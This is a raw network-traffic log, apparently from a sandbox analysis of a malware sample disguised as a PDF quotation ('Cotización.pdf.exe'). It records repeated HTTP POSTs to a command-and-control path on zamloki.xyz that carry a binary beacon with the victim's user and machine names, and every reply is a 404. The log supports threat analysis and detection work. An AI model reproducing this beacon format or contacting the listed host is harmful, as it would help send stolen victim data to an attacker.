                                      Jul 15, 2021 12:44:27.466872931 CEST5875OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:27.762160063 CEST5876INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:27 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=K%2FDzk2sBrldIikhtXW5882LFwIJG8LhBN4AW%2BpMm2yQ50vAZczyjdUoXOYEsPN2pOaV0THYWMdHOo8MlxeU9pbr7pAtANe9dyXBr6stU%2FLI1%2BzzNzBnsU4c%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265479db42bd6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      68192.168.2.349802172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:28.025244951 CEST5877OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:28.045146942 CEST5877OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:28.327338934 CEST5878INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:28 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9dcHYjyQjm%2Fe5YSeuh9DXQD%2B67CBAsXtD9pmZSMvdfiU%2Bc90c%2FkssLPTYtP9kKHR6ddqSNEVHPYEt3RUtzYtjOJoS1Z7xBvESre0oelfy6534gsfo0qWIJQ4wWAijQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2654b3d5d4e08-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      69192.168.2.349803172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:28.570585966 CEST5878OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:28.588264942 CEST5879OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:29.111253023 CEST5879INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=oqBqJgOXpCtk%2FDDEPUWfHGYqBf01an9JqnWh2WPDEt6BI9yimb5hSoWSHlJCNuHW0i4MQ0VDy%2FGt3JJHVH5DYxcP8g3Ht6HUpGGNHGjP%2FHruxN%2FJgqa0KA0%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2654e994e2bad-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      7192.168.2.349732172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:52.663590908 CEST1380OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:52.682116032 CEST1381OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:52.925607920 CEST1381INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:52 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jGPREaPbzgnu%2BamB%2Fkm3VaaXtMMmUgtnQKv9vNmqeHyMpHFSfuOgdidzDqid1DR8QNW5bcPZYhxH1tC9fmfsNrRn9Mi78ZPjq1vm77mjMzjbU8Wj%2FbDrbtV69xlXKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2646e38642b4d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      70192.168.2.349804104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:29.405322075 CEST5880OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:29.426326990 CEST5881OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:29.723398924 CEST5881INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TpaFqSieQpYbrroWwwSTolVWHVy8iizCSiZ6gd5SXxQ2A3s0Tdq0eMV1T1AWqurVH1nkqo8w09offr0giWEHI%2BK2of%2FXodmfoaFo3yLl7TMZQw8G5K5wdmhwbGnS3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26553daed97de-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      71192.168.2.349805172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:29.965275049 CEST5882OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:29.985312939 CEST5882OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:30.576950073 CEST5883INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HeXXoLjDJzT6gJ4mh2Z1tQu3RjxvKBLqVbKQbQ9rE6JmZ6ZPgYd9YM18DyHntdpaiTehgUUaG6jXWNX4en7qAN%2BWhNPVRyPkqwrGNNAheLQ7HBgIyk%2FVWao%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2655759132bc2-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      72192.168.2.349806172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:30.816046953 CEST5884OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:30.836173058 CEST5884OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:31.081335068 CEST5885INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:31 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zckum6ZnqP%2F076yG5xymPqAhQJXLeoXpBC5J%2Fb31%2Bc1ELd8EqAOC1cXJ%2BKDo4Mi0tc3M0FcLdrCcxDQiEv2gCLM0zKhKFVfKSxO4aaYe3QkzUgMFc2NYFXc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2655caab74a55-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      73192.168.2.349807172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:31.313118935 CEST5886OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:31.331073046 CEST5886OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:31.572861910 CEST5887INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:31 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=DiTClOkn5TA71CKelidaNn0tCGQYAPRy1%2BGJexJ3%2BfE2Uxl6SGfLK0dlZGo5Ta8Wlvt5YDN5h7GIgvv14FuKSp1qp8Q4dD9nsgEU6%2FEzBFJXZ5ZCXa2ILcA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2655fccc6061c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      74192.168.2.349808104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:31.831490993 CEST5888OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:31.851401091 CEST5888OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:32.089653015 CEST5889INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=LjO6cvPcCFEryjFf8BNUwQSEW3tlsO%2Bq%2BmEZDEWwV9xCNf%2Bf7gbgVe9TQxV3RL%2FHOuShjaYKnKC9twS1lh2VcoVLX%2BJlyVi9L7DQ0V1x02h4B5pVf5fSBEg%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26563092b177a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      75192.168.2.349809104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:32.367486000 CEST5890OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:32.387613058 CEST5890OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:32.649143934 CEST5891INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=5NGYW8EBccYbSR9fntMZOuBhy9tL6AcLlP3e72aHg2unTQGrf2N1qLX3YM6Z2iiafwGcP7dlfsbkaa95l9hGJLPEg%2Fy88XNvGEduq9RI39D3sMcF%2BUiqIG8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265666fbc4ab6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      76192.168.2.349810172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:32.911797047 CEST5891OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:32.931454897 CEST5892OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:33.204446077 CEST5892INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Vv8uIBt2niGsT4aRgKwuN6vgf4JDq3WjoenE3qacSwECY50i07%2FbvxCyO46HhkJUHRwvkeWD%2FaR0e7ybSiVwGe%2FLifd6E1zAaEBBgESUK7%2BFQmJfAYQpJzs%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26569cf09c2d6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      77192.168.2.349811172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:33.437657118 CEST5893OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:33.457449913 CEST5894OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:33.705465078 CEST5894INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=wKrC7pkQ4P8MkW4GFoMYz%2FRbV%2FJzM9h1tPtRuUpCmVrdWM5xTt5J8nBD85DL1hGJ80yx3Hey3ZpzSOFLLh3XOLsLPJWWWAr8%2BxS1QauPMrKqbgS6oAi7qt8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2656d098e4eaa-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      78192.168.2.349812104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:33.951078892 CEST5895OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:33.968714952 CEST5895OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:34.221647978 CEST5896INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=I9%2BohHqxGwmOsbL9Yk0cJMb81x3012O1EiFbfHpNINVc9lTlw%2FAE7KkypqgC7IS4Sjr3jnVk8ozaM7V2N2H8FgdYQaOKV6VUvWyLhsZOw9CRhmwsCQ%2BQpiw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2657038e1d6d5-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      79192.168.2.349813104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:34.459346056 CEST5897OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:34.479252100 CEST5897OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:34.752250910 CEST5898INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=bE6%2F45LhD3HmrF9UPtt95pOqljyoeXskc6v8mxXdq6xbRzN5cwlyFDd25%2FBKgMU0bBfluf5NUEm3qo1avTB%2FPFXQVrNVdkoC28rx0XMZG9cot5sUNnq3zUc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265737d484e8c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      8192.168.2.349733104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
